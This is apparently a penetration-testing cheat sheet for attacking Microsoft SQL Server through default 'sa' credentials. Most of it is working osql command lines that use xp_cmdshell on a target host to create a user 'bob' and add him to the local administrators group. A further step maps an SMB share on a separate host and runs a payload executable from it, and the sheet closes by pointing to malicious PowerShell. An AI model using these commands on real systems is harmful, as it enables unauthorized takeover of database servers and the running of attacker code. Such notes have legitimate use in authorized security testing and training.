Authentication modes:

Choose an authentication mode - SQL Server

sa:<blank> or sa:sa default creds for db auth

Trusted Auth is domain-based, requires user in correct group

Metasploit mssql_enum module

osql -U sa -P"" -S 192.168.1.55 -Q "exec master..xp_cmdshell'net user bob @BobLab1 /add'" osql -U sa -P"" -S 192.168.1.55 -Q "exec master..xp_cmdshell'net user'" osql -U sa -P"" -S 192.168.1.55 -Q "exec master..xp_cmdshell'net localgroup administrators bob /add'" osql -U sa -P"" -S 192.168.1.55 -Q "exec master..xp_cmdshell'net localgroup administrators'

Then RDP to system, OR, run payload from SMB share:

osql -U sa -P"" -S 192.168.1.55 -Q "exec master..xp_cmdshell'net use z: \\10.10.10.10\bob BobLab1 /USER:10.10.10.10\bob" osql -U sa -P"" -S 192.168.1.55 -Q "exec master..xp_cmdshell‘Z:\payload.exe’”

OR execute malicious PowerShell